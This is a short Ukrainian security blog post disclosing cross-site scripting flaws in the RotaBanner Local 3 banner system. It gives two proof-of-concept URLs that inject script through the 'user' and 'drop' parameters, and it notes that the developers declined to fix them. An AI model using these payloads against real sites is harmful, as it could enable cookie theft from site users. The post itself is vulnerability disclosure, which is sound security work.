Websecurity - Веб безпека

12.10.2007

У травні, 14.05.2007, я знайшов Cross-Site Scripting уразливості в банерній системі RotaBanner (виробництва Art. Lebedev Group).

Деталі уразливостей з’являться пізніше, спочатку повідомлю розробникам системи.

10.12.2007

Уразливості в файлі index.html в параметрах user та drop. Вразлива версія RotaBanner Local 3 (та попередні).

XSS:

http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дані уразливості в системі досі не виправлені. Причому девелопери RotaBanner, як вони відповіли мені, не вважають за потрібне виправляти ці уразливості (що наявні на багатьох сайтах, котрі використовують дану систему).

This entry was posted on 18:30 10.12.2007 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.